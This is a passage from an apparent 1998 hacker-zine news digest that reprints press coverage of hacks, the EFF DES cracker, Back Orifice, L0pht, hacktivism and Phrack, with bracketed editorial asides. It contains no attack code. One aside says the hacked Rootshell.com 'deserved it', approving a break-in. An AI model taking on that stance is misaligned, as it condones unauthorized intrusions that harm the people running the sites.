+"It's a perfect example of how overconfidence can eventually cause a
+problem," said Peter Shipley, who analyzes and bolsters system security
+for accounting firm KPMG Peat Marwick.
+
+Though it wasn't clear that PageMart's system was actually broken into,
+Shipley said poor protection against break-ins is all too common. "I'm in
+the business of doing these type of security audits, and a large number of
+systems I've seen have easy password access -- under the assumption of
+'why would somebody want to hack it?'"
+
+In fact, paging services are responsible for enormously valuable data,
+from billing addresses to credit card information and more, Shipley said. 
+Then there are the messages themselves, which can be easily netted as they
+make their way through the airwaves.
+
+"Smaller companies believe they are not targets [for hackers],"  concluded
+KPMG's Shipley. "But small companies are as equally targeted as large
+companies. They're stepping stones -- the small fish that hackers start
+on."
+
+0x16>------------------------------------------------------------------------
+
+Title: FBI busts hacker who sold clandestine accounts on PageNet system
+Date: July 30, 1998 7:28 p.m. EDT
+Source: Nando Times
+
+PageNet Inc., one of the largest wireless message providers, said U.S.
+federal agents arrested a San Diego man Thursday who allegedly set up
+unauthorized voice mailboxes and paging accounts on its system, costing
+the company about $1 million.
+
+[snip...]
+
+0x17>------------------------------------------------------------------------
+
+Title: EFF DES Cracker Machine Brings Honesty to Crypto Debate
+Date: July 17, 1998
+
+"EFF DES CRACKER" MACHINE BRINGS HONESTY TO CRYPTO DEBATE
+ELECTRONIC FRONTIER FOUNDATION PROVES THAT DES IS NOT SECURE
+
+SAN FRANCISCO, CA -- The Electronic Frontier Foundation (EFF) today raised
+the level of honesty in crypto politics by revealing that the Data
+Encryption Standard (DES) is insecure.  The U.S. government has long
+pressed industry to limit encryption to DES (and even weaker forms),
+without revealing how easy it is to crack.  Continued adherence to this
+policy would put critical infrastructures at risk; society should choose a
+different course.
+
+To prove the insecurity of DES, EFF built the first unclassified hardware
+for cracking messages encoded with it.  On Wednesday of this week the EFF
+DES Cracker, which was built for less than $250,000, easily won RSA
+Laboratory's "DES Challenge II" contest and a $10,000 cash prize.  It took
+the machine less than 3 days to complete the challenge, shattering the
+previous record of 39 days set by a massive network of tens of thousands
+of computers.  The research results are fully documented in a book
+published this week by EFF and O'Reilly and Associates, entitled "Cracking
+DES: Secrets of Encryption Research, Wiretap Politics, and Chip Design."
+
+[snip...]
+
+0x18>------------------------------------------------------------------------
+
+Title: Hacking site gets hacked
+By: Paul Festa
+Source: CNET News.com
+Date: October 28, 1998, 11:30 a.m. PT
+
+Hacking and security news and information site Rootshell.com was the
+subject of its own coverage today after suffering an early morning hack.
+
+The hack, preserved here, occurred this morning at 5:12 a.m. PT, according
+to Rootshell.  Administrators took the site down after discovering the
+attack at 6 a.m. PT. The site was restored two hours later.
+
+"Steps have been taken to prevent re-entry, and full details are now being
+turned over to law enforcement for what we hope will turn into arrests," 
+Rootshell administrator Kit Knox said this morning in a statement.
+
+[Hrm. Lets give out scripts that help every clueless script kiddie
+ break into thousands of sites worldwide.. then narc off the one
+ that breaks into us. Time to face the music. That's like the pot
+ calling the kettle black. Name your cliche', they deserved it.]
+
+Knox later said that the matter had been turned over to the FBI. 
+
+The attacker replaced the Rootshell.com front page with a rambling screed
+peppered with profanity as well as references to groups and luminaries in
+the hacking world, including imprisoned hacker and perennial cause Kevin
+Mitnick.
+
+The attacker also threatened to hit another hacking news site, AntiOnline. 
+
+0x19>------------------------------------------------------------------------
+
+Title: From Criminals to Web Crawlers
+By: Kristen Philipkoski 
+Date: 4:00am  15.Jul.98.PDT
+
+A crime-fighting search engine used to fight terrorism and insurance scams
+may soon find a home at one of the Web's top search engines. The system,
+called VCLAS, has helped detectives crack cases all over the world. 
+
+"In 11 days, the PhoneFraud software helped law-enforcement agencies in
+New York uncover US$1.2 billion in stolen services," said Jay Valentine,
+president and CEO of InfoGlide, the company that owns the VCLAS software
+package.
+
+The software is built around a "Similarity Search Engine," which thrives
+on imperfect and complex information, data that engineer David Wheeler
+said often stumps search algorithms based on neural networks. 
+
+Similarity searching is well-suited to crime work, Wheeler said, because
+investigations are often inherently random and disconnected. For instance,
+if police are looking for a red vehicle, but a witness says it was maroon,
+a traditional keyword search wouldn't register a match since it couldn't
+recognize that the colors are similar. 
+
+0x1a>------------------------------------------------------------------------
+
+Title: Running a Microsoft OS on a Network? Our Condolences 
+Date: July 21, 1998
+
+[The title alone made this worth including.]
+
+The CULT OF THE DEAD COW (cDc) will release Back Orifice, a remote MS
+Windows Administration tool at Defcon VI in Las Vegas (www.defcon.org) on
+August 1. Programmed by Sir Dystic [cDc], Back Orifice is a
+self-contained, self-installing utility which allows the user to control
+and monitor computers running the Windows operating system over a network. 
+
+Sir Dystic sounded like an overworked sysadmin when he said, "The two main
+legitimate purposes for BO are, remote tech support aid and employee
+monitoring and administering [of a Windows network]." 
+
+Back Orifice is going to be made available to anyone who takes the time to
+download it. So what does that mean for anyone who's bought into
+Microsoft's Swiss cheese approach to security? Plenty according to Mike
+Bloom, Chief Technical Officer for Gomi Media in Toronto. 
+
+[snip...]
+
+None of this is lost on Microsoft. But then again, they don't care. 
+Security is way down on their list of priorities according to security
+expert Russ Cooper of NT BUGTRAQ (www.ntbugtraq.com). "Microsoft doesn't
+care about security because I don't believe they think it affects their
+profit. And honestly, it probably doesn't." Nice. But regardless of which
+side of the firewall you sit on, you can't afford not to have a copy of
+Back Orifice. Here are the specs: 
+
+[snip...]
+
+After August 3, Back Orifice will be available from www.cultdeadcow.com
+free of charge. 
+
+0x1b>------------------------------------------------------------------------
+
+Title: Security expert explains New York Times site break in
+Date: September 18, 1998
+By: Ellen Messmer 
+
+Although the New York Times is not revealing the details of what happened
+last weekend when it was hijacked by a hacker group, one security expert
+has it figured out.
+
+A group of hackers calling themselves Hackers for Girlies broke into the
+Times news site on Sunday. The hackers took control of the site to display
+their own diatribe complete with nude images and to protest the arrest of
+hacker Kevin Mitnick. The Times worked for half a day to regain command of
+its server.
+
+Hackers often break in by exploiting security vulnerabilities associated
+with default Common Gateway Interface scripts that ship with Web servers,
+according to Patrick Taylor, director of strategic marketing at Internet
+Security Systems in Atlanta. They exploit these scripts to send a string
+of long commands to cause a buffer overflow that lets them into the
+operating system. They first give themselves an account in the system and
+then stick in a backdoor Trojan horse program such as "rootkit" to gain
+and maintain root control, he said.
+
+"CGI scripts are intended to pass commands from the Web server to
+something in the operating system, perhaps to pull database information," 
+Taylor said. "But you should get rid of these superfluous CGI scripts and
+depend on your own custom scripts."
+
+The Times may have had a long struggle regaining control of its Web site
+because the latest Trojan horses are designed so well that they hide
+within the operating system, encrypted or even providing the same checksum
+as the legitimate operating system.
+
+"It's nefarious--the hacker essentially has remote administration of the
+Web server," Taylor said. "You can't rely on a backup of the machine.  You
+may have to reinstall the entire operating system."
+
+By coincidence, the Times had once looked at using the ISS security gear,
+but decided not to, he said. The Times declined to discuss any aspect of
+its Web operations, saying it was "a matter of security."
+
+[The real reason for this article and quoting a PR person from
+ ISS maybe? Fact is, ISS didn't audit the network before OR
+ after the breakin. How would this guy know the method they used
+ to compromise the machine?]
+
+The "Hackers for Girlies" ranted in its own posting to have "busted root" 
+on the Times, and directed some invective toward Times reporter John
+Markoff and security expert Tsutomu Shimomura for their respective roles
+in the investigation of hacker Kevin Mitnick, now held in jail.  Markoff
+and Shimomura two years ago collaborated on a book entitled "Takedown" 
+about the law enforcement pursuit of Mitnick. In its own account, the
+Times said the hacker incident at nytimes.com may be related to an
+upcoming trial in January of Mitnick.
+
+While hacker rantings and pornography can be bad enough to discover on a
+Web site, a far more serious scenario involves a hijacker more
+surreptitiously posting information that has been slightly changed,
+leading the reader to view it as authentic.
+
+"This could end up like 'War of the Worlds,' where people went into a
+panic because they didn't know what they were hearing on the radio was
+made up," commented Doug Barney, Network World news editor.
+
+0x1c>------------------------------------------------------------------------
+
+Title: Merriam-Webster Taken Offline Old Fashioned Way
+Date: Wed Aug  5 00:41:57 MDT 1998
+Source: www.m-w.com
+
+What happened?
+
+On Thursday night, July 30th, the facility that hosts Merriam-Webster's
+Web site was burglarized and its servers were stolen. We've managed to
+restore limited capacity, but we need to obtain new hardware from our
+suppliers before we can return to full service. We hope to have the entire
+site active again in a few days. We apologize for the inconvenience and
+hope you will bear with us as we deal with the situation. 
+
+Thank you for your patience.
+
+--The Merriam-Webster Web Team
+
+[Guess we shouldn't put the computer by the window...]
+
+0x1d>------------------------------------------------------------------------
+
+Title: Long Haired Hacker Works Magic           [my title]
+Source: Nando Times
+Date: September 20, 1998
+
+The hacker calling himself Mudge pushed his long hair back, scratched his
+beard and stared at the computer screen. He knew there was something wrong
+with the data traffic he was watching, but what was it?
+ 
+A week earlier, Mudge and his fellow hackers in their hangout known as the
+L0pht -- pronounced "loft" -- had acquired some software that was supposed
+to let computers talk to each other in code. But as Mudge watched the data
+he realized someone else was doing the same and maybe even decoding it,
+which shouldn't happen.
+ 
+"So you are saying that you're using DES to communicate between the
+computers?" Mudge recalled asking representatives of the software maker. 
+Yes, they said, they were using DES, a standard encryption method that for
+years was considered virtually uncrackable.
+
+But this wasn't DES, thought Mudge. It's almost as if... 
+
+Whoa. He blinked and felt the adrenaline kick in. This wasn't secure at
+all. In fact, the encoding was only slightly more complex than the simple
+ciphers kids did in grade school -- where "A" is set to 1, "B"  is set to
+2, and so on.
+
+The company was selling this software as a secure product, charging
+customers up to $10,000. And yet, it had a security hole big enough to
+waltz through.
+ 
+Instead of exploiting this knowledge, Mudge confronted the company. 
+
+"You realize there isn't any secure or 'strong' encoding being used in
+your communications between the computers, don't you?" he asked.
+
+"Well..." 
+
+"And that you claimed you were using DES to encrypt the data," he pressed. 
+
+"That will go in the next revision." 
+
+Mudge is a "real" hacker -- one who used to snoop around the nation's
+electronic infrastructure for the sheer love of knowing how it worked. His
+kind today are sighted about as often as the timberwolf, and society has
+attached to them the same level of legend.
+
+Like the wolf, they were once considered a scourge. Law enforcement and
+telecommunication companies investigated and arrested many of them during
+the late 1980s and early '90s.
+
+Today, many elite hackers of the past are making a go at legitimate work,
+getting paid big bucks by Fortune 500 companies to explore computer
+networks and find the weak spots. 
+
+And none too soon. The void left by the old hackers has been filled by a
+new, more destructive generation.
+
+So today, Mudge -- who uses a pseudonym like others in the hacker
+community, a world where anonymity keeps you out of trouble -- wears a
+white hat. As part of L0pht, the hacker think tank, he and six comrades
+hole up in a South End loft space in Boston and spend their evenings
+peeling open software and computer networks to see how they work.
+
+When they find vulnerabilities in supposedly secure systems, they publish
+their findings on the Web in hopes of embarrassing the companies into
+fixing the problems. A recent example: They posted notice via the Internet
+of a problem that makes Lotus Notes vulnerable to malicious hackers...
+
+A Lotus spokesman said the company was aware of the flaw but it was
+extremely technical and unlikely to affect anyone.
+
+The hackers at L0pht have made enemies among industry people, but they
+command respect. They were even called to testify before the U.S.  Senate
+Committee on Governmental Affairs in May. 
+
+Why do they publish what they find? 
+
+"If that information doesn't get out," Mudge replies, "then only the bad
+guys will have it."
+ 
+The "bad guys" are the hacker cliche: secretive teens lurking online,
+stealing credit card numbers, breaking into Pentagon systems, and
+generally causing trouble. One of L0pht's members, Kingpin, was just such
+a cad when he was younger, extending his online shenanigans to real-world
+breaking and entering. Today, L0pht keeps him out of mischief, he said.
+
+"We're like midnight basketball for hackers," said Weld Pond, another
+member.
+ 
+****
+
+Malicious hacking seems to be on the rise. 
+
+Nearly two out of three companies reported unauthorized use of their
+computer systems in the past year, according to a study by the Computer
+Security Institute and the FBI. Another study, from Software AG Americas,
+said 7 percent of companies reported a "very serious"  security breach,
+and an additional 16 percent reported "worrisome"  breaches. However, 72
+percent said the intrusions were relatively minor with no damage.
+
+American companies spent almost $6.3 billion on computer security last
+year, according to research firm DataQuest. The market is expected to grow
+to $13 billion by 2000.
+
+Government computers are vulnerable, too. The Defense Department suffered
+almost 250,000 hacks in 1995, the General Accounting Office reported. Most
+were detected only long after the attack. 
+
+This is why business booms for good-guy hackers. 
+
+Jeff Moss, a security expert with Secure Computing Inc., runs a
+$995-a-ticket professional conference for network administrators, where
+hackers-cum-consultants mingle with military brass and CEOs.
+
+"I don't feel like a sellout," said Moss, who wouldn't elaborate on his
+hacking background. "People used to do this because they were really into
+it. Now you can be into it and be paid."
+
+News reports show why such services are needed: 
+
+----Earlier this month, hackers struck the Web site of The New York Times,
+forcing the company to shutter it for hours. Spokeswoman Nancy Nielsen
+said the break-in was being treated as a crime, not a prank.  The FBI's
+computer crime unit was investigating. 
+
+----This spring, two California teenagers were arrested for trying to hack
+the Pentagon's computers. Israeli teen Ehud Tenebaum, also known as "The
+Analyzer," said he mentored the two on how to do it. The two Cloverdale,
+Calif., youths pleaded guilty in late July and were placed on probation.
+
+----Kevin Mitnick, the only hacker to make the FBI's 10 Most Wanted list,
+was arrested in 1995, accused of stealing 20,000 credit card numbers. He
+remains in prison. A film called "TakeDown," about the electronic
+sleuthing that led to Mitnick's capture, is in the works.  Comments
+protesting Mitnick's prosecution were left during the hack of the New York
+Times Web site.
+
+----In 1994, Vladimir Levin, a graduate of St. Petersburg Tekhnologichesky
+University, allegedly masterminded a Russian hacker gang and stole $10
+million from Citibank computers. A year later, he was arrested by Interpol
+at Heathrow airport in London.
+
+******
+
+"Lemme tell ya," growled Mark Abene one night over Japanese steak skewers. 
+"Kids these days, they got no respect for their elders."
+
+Abene, known among fellow hackers as Phiber Optik, should know. He was one
+of those no-account kids in the 1980s when he discovered telephones and
+computers. For almost 10 years, he wandered freely through the nation's
+telephone computer systems and, oh, the things he did and saw. 
+
+Celebrities' credit reports were his for the taking. Unlimited free phone
+calls from pilfered long-distance calling card numbers. Private phone
+lines for his buddies, not listed anywhere. And the arcane knowledge of
+trunk lines, switches, the entire glory of the network that connected New
+York City to the rest of the world.
+
+But Abene's ticket to ride was canceled in January 1994, when, at age 22,
+he entered Pennsylvania's Schuylkill Prison to begin serving a
+year-and-a-day sentence for computer trespassing. The FBI and the Secret
+Service described him as a menace. The sentencing judge said Abene, as a
+spokesman for the hacking community, would be made an example.
+
+And yet, to many in the digital community, Abene's offenses amounted to
+unbridled curiosity. He was just a kid poking around, doing what teen boys
+do, going to places they're told to avoid.
+
+"Phree Phiber Optik" pins appeared. Many felt Abene embodied the hacker
+ethic espoused by his friend and fellow hacker, Paul Stira:  "Thou Shalt
+Not Destroy."
+
+With black hair parted in the middle and falling to the center of his
+back, a thin beard ringing his mouth, the 26-year-old Abene still looks
+like a mischievous kid. Hacking, he said, is hardwired in boys.  When they
+play with toys when they're young, they break them, then try to figure out
+how the parts fit back together.
+
+He added, "For some of us, it just never goes away." 
+
+******
+
+Still, the hackers of the 1980s and early '90s have grown up. Some got
+busted, others simply graduated from college and fell out of the scene.
+
+Today, many want to be seen as mainstream, said Jeremy Rauch, a network
+security expert for Secure Computing Inc. When it's time to talk
+consulting contracts with major corporations, the hair gets neatly combed,
+the suit replaces the combat boots and black T-shirt, and the
+counterculture rhetoric gets toned down.
+
+A hacker in San Francisco who edits the online publication Phrack and goes
+by the pseudonym Route talks about his job at a security firm as a sign of
+maturity. Contentedly, he notes he can work from home, write as much code
+as he can and never punch a clock. 
+
+"Are there still hackers out there?" asked Mike Godwin, counsel for the
+Electronic Frontier Foundation, a cyber-rights group. In the early 1990s,
+he pushed hard for the organization to champion Abene and other members of
+the cyber gang Masters of Deception. By 1993, he said, hysteria
+surrounding hackers began to sputter, to be replaced by a fear of
+pornography.
+
+"There never were very many hackers," he said, not major ones, anyway. 
+Mainly, they were and are "this tiny minority of 13- to 18-year-olds who
+learned how to make toll-calls for free."
+
+Today's younger hackers pull programs off the Web that sniff for passwords
+and unlock backdoors automatically. It's the equivalent of rattling every
+door on a street and finally getting lucky, chancing upon one that's
+unlocked. 
+
+As for the true hackers of the first generation, Godwin said: "These guys
+are genuinely smart and genuinely have a fascination with the technology. 
+And they're mostly harmless."
+
+*********
+
+What do younger hackers say to all this? 
+
+Not much, if you judge by interviews at DefCon6.0, the sixth annual hacker
+forum and party held in Las Vegas at the end of July.
+
+Some said they hack to learn. Others took a counter-culture stance: 
+hacking as civil disobedience. They wouldn't give names or talk
+specifically about any criminal activities. It was as if they wanted to
+present themselves as blank slates, upon which the fears of their
+non-wired elders could be inscribed.
+
+At DefCon, they set off stink bombs at one point, and pulled other
+juvenile pranks.
+
+"Paging Mr. Mitnick," the intercom droned through the hotel-casino's
+meeting rooms. The unwitting hotel staff member repeated the call for the
+jailed hacker. "Paging Mr. Kevin Mitnick."
+
+Pony-tailed guys dressed in black smirked. Gotcha. 
+
+As hard house and techno music provided a soundtrack, they drooled over
+new software and pawed through piles of stuff for sale: computer
+equipment, of course, but also more books on conspiracy, privacy
+protection, and police methods than any paranoid could want.
+
+Among the titles: "Scanners & Secret Frequencies," "Secrets of a Super
+Hacker," even "Throbbing Modems."
+
+The kids flocked to DefCon's talk by the "white hat" hackers of L0pht. 
+
+"We're in the middle generation right now," said convention organizer
+Moss. "You've got your original hackers from MIT -- the old school -- who
+are established. They're the forefathers of this information revolution. 
+And you've got us who watched computers go from mainframe to desktop to
+laptop. And you've got the younger generation that have always known
+computers." 
+
+0x1e>------------------------------------------------------------------------
+
+Title: Body of Evidence
+By: Beverly Hanly
+Date: 4:00am  5.Aug.98.PDT
+
+Real criminals are tried in real courts, so why shouldn't virtual
+criminals be tried in virtual courts?
+
+A handful of legal scholars from the Institute on the Arts and Civic
+Dialogue (IACD) are mulling over the question and will convene Wednesday
+to discuss whether virtual courts are the best forum for cybercrime trials
+and if a virtual legal system could lead to new legal processes regarding
+real world crimes.
+
+The experts will join multimedia artist Shu Lea Cheang, creator of the
+Brandon project, for a webcast forum from 8 to 11 pm, EDT, at the Harvard
+Law School.
+
+The group will play out a fictitious courtroom drama based on several
+disputes involving cyberetiquette, gender identity, and the hazy line
+between fantasy vs. reality as the first public forum in the year-long
+Brandon project commissioned by New York's Guggenheim Museum. Brandon
+explores issues of gender identity and the consequences of experimenting
+with sexuality in real life and in cyberspace.
+
+The ongoing media and legal debate regarding hate speech and the
+proliferation of sexual content on the Internet and whether or not these
+are harmful -- and to whom -- is the territory the mock trial will cover.
+
+Harvard theater director Liz Diamond will collaborate with Cheang to guide
+the group as they dramatize elements drawn from real-life sexual assault
+cases, including that of the project's namesake Teena Brandon, a
+transsexual who was murdered in Nebraska in 1993. Other cases will involve
+a virtual trial for "cyberrape," a MUD character named Mr.  Bungle, and
+the FBI arrest of Michigan student Jake Baker for his rape-and-murder
+fantasy about a fellow student posted to a Usenet newsgroup in 1994.
+
+Actors will play the roles of victims and perpetrators, while professors
+from Harvard, University of Virginia, and Columbia law schools will act as
+"standing jurors" to examine and comment on the legalities.
+
+"This is a venue where you can experiment with the process and substance
+of these [cyberlaw] cases,"  said Jennifer Mnookin, professor of law at
+Virginia's School of Law in Charlottesville, who will sit in on the
+session. She feels that virtual worlds like LambdaMOO can provide a new
+and more appropriate arena for dispute resolution.
+
+"Part of what's at issue here is how much someone can be hurt with words," 
+said Mnookin. "Someone who commits a violation in cyberspace shouldn't
+necessarily be subject to consequences in real courtrooms. Something like
+the LambdaMOO 'cyberrape' was appropriately settled in a virtual court. 
+The perpetrator was expelled from that world, his virtual identity was
+annihilated -- he was 'toaded.' What is a violation in one world might not
+be in another."
+
+Virtual penalties can translate from one world to the other as well. 
+Cheang, in her virtual court, suggests the idea of "virtual castration" as
+an alternative to "chemical castration" advocated by some as a way of
+dealing with sexual offenders.
+
+The August public event in Cambridge, Massachusetts, is the first time
+since the Brandon project began on 20 June that Cheang will be able to
+interact with both a live and a Net audience.
+
+"The test will serve as a base toward constructing a digiarchitextual
+space of a virtual court at the Guggenheim's [proposed] virtual museum," 
+said Cheang, who will collaborate with an architect of physical spaces to
+create a "courtroom"  at the museum. "My work has always fused actual and
+virtual space."
+
+Netizens need nothing more than an Internet connection to tune in to the
+mock trial. But Cheang also wants to include a public that has no access
+to Net technology.
+
+Anyone in the Harvard area who's interested can physically attend the
+staged trial. In New York, street audiences can visit the Guggenheim
+SoHo's video wall, which is made up of 75 contiguous 40-inch projection
+cubes. The video wall will display images from the Brandon project and
+audiences will be able to interact at scheduled times.
+
+"We're not sure how the 'experimentation' with the audience will go," said
+Cheang.  "Maybe we'll fail badly. But it is this uncertainty, this feeling
+that we're exploring new ground in public interaction that is most
+exciting for me and my collaborators here at the Institute."
+
+Law professor Mnookin looks at the experiment as a venue that can open up
+the dialog on cyberlaw issues. "What's interesting to me about 'virtual
+law' is that it's much more obvious than in the real world that the rules
+are malleable, that they're created by the participants.
+
+"In the real world, it's easy to take the legal processes for granted, to
+assume that [those processes] can't easily be transformed," she continued. 
+"If virtual worlds are used as laboratories, it's easier to recognize the
+possibilities for change -- both within a virtual environment, and, just
+maybe, in the real world as well."
+
+The Brandon Project is hosted at Harvard in conjunction with the brand-new
+IACD until 14 August. IACD puts artists in various media together with a
+community of scholars, journalists, and civic activists to explore current
+events and controversies.
+
+After the test trial, Cheang will move on to Amsterdam, Netherlands, to
+begin setting up the next live installation of the project: "Digi Gender,
+Social Body: Under the Knife, Under the Spell of Anesthesia,"  to be
+webcast in September 1998. "Would the Jurors Please Stand Up? Crime and
+Punishment as Net Spectacle" is scheduled for May 1999.
+
+0x1f>------------------------------------------------------------------------
+
+Title: The Golden Age of Hacktivism
+By: Niall McKay
+Date: 4:00a.m.  22.Sep.98.PDT
+
+On the eve of Sweden's general election, Internet saboteurs targeted the
+Web site of that country's right-wing Moderates political party, defacing
+pages and establishing links to the homepages of the left-wing party and a
+pornography site.
+
+But the Scandanavian crack Saturday was not the work of bored juveniles
+armed with a Unix account, a slice of easily compiled code, and a few
+hours to kill. It advanced a specific political agenda.
+
+"The future of activism is on the Internet," said Stanton McCandlish,
+program director of the Electronic Frontier Foundation. "More and more,
+what is considered an offline issue, such as protesting the treatment of
+the Zapatistas in Mexico, is being protested on the Net."
+
+In the computer-security community, it's called "hacktivism," a kind of
+electronic civil disobedience in which activists take direct action by
+breaking into or protesting with government or corporate computer systems. 
+It's a kind of low-level information warfare, and it's on the rise.
+
+Last week, for example, a group of hackers called X-pilot rewrote the home
+page of a Mexican government site to protest what they said were instances
+of government corruption and censorship.  The group, which did not reply
+to several emails, made the claims to the Hacker News Network. The
+hacktivists were bringing an offline issue into the online world,
+McClandish said. 
+
+The phenomenon is becoming common enough that next month, the longtime
+computer-security group, the Cult of the Dead Cow will launch the resource
+site hacktivism.org. The site will host online workshops, demonstrations,
+and software tools for digital activists.
+
+"We want to provide resources to empower people who want to take part in
+activism on the Internet," said Oxblood Ruffian, a former United Nations
+consultant who belongs to the Cult of the Dead Cow.
+
+Oxblood Ruffian's group is no newcomer to hacktivism. They have been
+working with the Hong Kong Blondes, a near-mythical group of Chinese
+dissidents that have been infiltrating police and security networks in
+China in an effort to forewarn political targets of imminent arrests.
+
+In a recent Wired News article, a member of the group said it would target
+the networks and Web sites of US companies doing business with China.
+
+Other recent hacktivist actions include a wave of attacks in August that
+drew attention to alleged human rights abuses in Indonesia. In June,
+attacks on computer systems in India's atomic energy research lab
+protested that country's nuclear bomb tests.
+
+More recently, on Mexican Independence Day, a US-based group called
+Electronic Disturbance Theater targeted the Web site of Mexican President
+Ernesto Zedillo.  The action was intended to protest Zedillo's alleged
+mistreatment of the Zapatista rebels in Chiapas. Nearly 8,000 people
+participated in the digital sit-in, which attempted to overwhelm the
+Mexican president's Web servers.
+
+"What we are trying to do is to find a place where the public can register
+their dissatisfaction in cyberspace, so that your everyday [mouse] clicker
+can participate in a public protest," said EDT co-founder Ricardo. 
+
+The apparent increase in hacktivism may be due in part to the growing
+importance of the Internet as a means of communication. As more people go
+online, Web sites become high-profile targets.
+
+It also demonstrates that many government sites are fairly easy to crack,
+said one former member of Milw0rm, the now defunct group that defaced the
+Indian research lab's Web site. In an interview in Internet Relay Chat,
+the cracker rattled off a list of vulnerable US government Web sites --
+including one hosting an electron particle accelerator and another of a US
+politician -- and their susceptibility to bugs.
+
+"They don't pay enough for computer people," said the cracker, who goes by
+the name t3k-9. "You get $50,000 for a $150,000 job." 
+
+Some security experts also believe that there is a new generation of
+crackers emerging. "The rise in political cracking in the past couple of
+years is because we now have the first generation of kids that have grown
+up with the Net," John Vranesevich, founder of the computer security Web
+site AntiOnline. "The first generation of the kids that grew up hacking
+are now between 25 and 35 - often the most politically active years in
+peoples' lives."
+
+"When the Cult of the Dead Cow was started in 1984, the average age [of
+our members] was 14, and they spent their time hacking soda machines," 
+said Oxblood Ruffian. "But the last couple of years has marked a turning
+point for us.  Our members are older, politicized, and extremely
+technically proficient."
+
+While hacktivists are lining up along one border, police and law
+enforcement officials are lining up along another.
+
+This year the FBI will establish a cyber warfare center called the
+National Infrastructure Protection Center. The US$64 million organization
+will replace the Computer Investigations and Infrastructure Threat
+Assessment Center and involve the intelligence community and the military.
+
+Allan Paller, director of research for the SANS Institute, said the FBI is
+staffing the new facility with the government's top security experts. 
+"They are stealing people from good places, including a woman from the
+Department of Energy who was particularly good," he said in a recent
+interview. "They are taking brilliant people."
+
+Paller also said that a grassroots effort is under way in Washington to
+establish a National Intrusion Center, modeled after the Centers for
+Disease Control.
+
+"There is definitely an increased threat of cyber terrorism," said Stephen
+Berry, spokesman for the FBI press office in Washington.
+
+As offline protests -- which are protected in the United States by the
+constitution -- enter the next digital age, the question remains: How will
+the FBI draw the distinction between relatively benign online political
+protests and cyber terrorism?
+
+0x20>------------------------------------------------------------------------
+
+Title: Phrack straddles the world of hackers
+Source: Nando Times
+Date: September 20, 1998
+
+The lines of text scrolled off the screen quickly, but the bleached-blond
+hacker snatched quick glances at the visitors' log on his Web page. Lots
+of visitors using military and government computers. The hacker, who calls
+himself Route, said he always gets a kick out of the feds' visits. He
+smiled. 
+ 
+The FBI, the CIA and the others "wouldn't be doing their job if they
+weren't tracking computer information both legitimate and illegitimate," 
+Route said. "I guess Phrack falls somewhere in between."
+ 
+Phrack is an online publication called a 'zine. It's a digital chimera: 
+written for hackers but read by law enforcement, too. It's been the
+subject of federal prosecution, yet it still operates in the open. Its
+name combines "hack" and "phreak," which refers to phone hacking.
+ 
+It's got attitude, technical know-how and in many ways defines today's
+hacker scene. It first hit the electronic bulletin boards Nov. 17, 1985,
+ages ago in hacker years.
+ 
+To put its longevity in perspective, Phrack came out two years after the
+movie "WarGames" in which actor Matthew Broderick established the
+now-cliched image of the hacker as the lonely kid who altered his grades
+with a computer. Phrack predates the World Wide Web by almost a decade. 
+And Phrack is older than many of its readers, who number about 8,000, said
+Route, who refuses to give his real name.
+ 
+Route, 24, doesn't look like the scrawny computer nerd with the
+cathode-ray pallor so many think of when the word hacker is mentioned. 
+Silver earrings dangle from each ear and a bar pierces his tongue. Spidery
+tattoos creep down his shoulders and over biceps grown solid with hours of
+iron work.
+ 
+Behind his glower lies a keen mind that cuts through computer network
+problems like a digital knife, an invaluable skill for his day job at a
+computer security firm with Fortune 500 companies for clients. Route
+refused to name his company.
+ 
+Phrack's improbable history begins in 1985 when a hacker with the handle
+Taran King cobbled together various subversive texts that had been
+circulating like Soviet-era samizdat on the archipelago of underground
+electronic bulletin boards.  It included all sorts of mischief-making: 
+"How to Pick Master Locks," "How to Make an Acetylene Bomb" and
+"School/College Computer Dial-Ups." 
+ 
+But Phrack found itself the focus of federal prosecution in 1990, when
+editor Craig Neidorf, also known as Knight Lightning, was prosecuted by
+the Chicago Computer Fraud and Abuse Task Force. His alleged crime? He
+published a document in Phrack with certain details of the emergency 911
+systems in use around the country. It had been given to him by another
+hacker who had copied it from computers owned by BellSouth, which valued
+it at almost $80,000. 
+ 
+But the task force wanted to prove the document was more than valuable. 
+Assistant U.S. Attorney William J. Cook said it put dangerous information
+in the hands of hackers.
+
+The case fell apart when Neidorf's lawyer proved that more detailed
+information about the system had appeared in other publications. You could
+order them from phone company technical catalogs for $13. The charges were
+dropped. Neidorf's trial was over.
+
+If today's Phrack is a bit less confrontational, that's understandable. 
+Like many of the older hackers, Route is shifting his focus away from
+anarchy texts and phone hacking to computer security. Its "how-to" days
+are pretty much over.
+
+"Phrack is not meant to be a manual of vulnerabilities," he said. 
+
+As the editor, Route knows that Phrack can still be used for illegal
+purposes. "But you can't hold people completely liable for just putting
+information out there."
+
+He said he has had "blatantly illegal stuff" sent to him. Once, he said he
+received the technical specifications for most pager systems used in the
+country, complete with how to hack those systems. He didn't publish. 
+
+"It's a judgment call," he said. "I have no intention of running up
+against the law or (upsetting) the military."
+
+But it's almost guaranteed that something gleaned from Phrack will be used
+against the computer system of a big and powerful organization or
+business.
+
+"The scene is going to do what the scene is going to do,"  he said. "It's
+like any clique in society. You have good people and you have bad people."
+
+0x21>------------------------------------------------------------------------
+
+Title: Cops see little hope in controlling computer crime
+By: Rob Lemos, 
+Source: ZDNN 
+Date: August 6, 1998 10:16 AM PT
+
+Despite making headway combating high-tech criminals, law enforcement
+officials say they remain worried about their ability to investigate and
+prosecute cyber crimes.  Encryption, anonymity, and the jurisdictional
+problems posed by a global Internet are quickly turning from small
+headaches to full-blown migraines for local, state, and federal police
+forces.
+
+"It's hard to predict where we will be in 10 years," said Scott Charney,
+chief of the computer crime and intellectual property section of the U.S.
+Department of Justice. "But there are going to be all sorts of birthing
+pains." Charney gathered here with other computer-savvy law enforcement
+officials to attend an international symposium on criminal justice issues
+at the University of Illinois at Chicago. The symposium focused on
+high-tech crime, cyber-terrorism, and information warfare.
+
+Invisible criminals Law enforcement officers say one of their biggest
+challenges paradoxically remains knowing when a crime is committed.
+
+According to the General Accounting Office, there were 250,000 attempted
+break-ins at the Department of Defense in 1995. NASA estimates that
+crackers -- hacker criminals -- broke in to over 120,000 of its systems in
+1996. Yet, few of those incidents are detected, much less reported. When
+DOD hackers broke into their own servers in 1996 and 1997, they attacked
+38,000 machines. Only four percent of the incidents were detected. Out of
+that number, only 27 percent of detected break-ins were reported. 
+
+"We will get better," said Doris Gardner, an investigator with the
+National Infrastructure Protection Center, a new federal agency
+established to fight computer crime. "We need to educate -- to work better
+with each other."
+
+Pandora's box
+
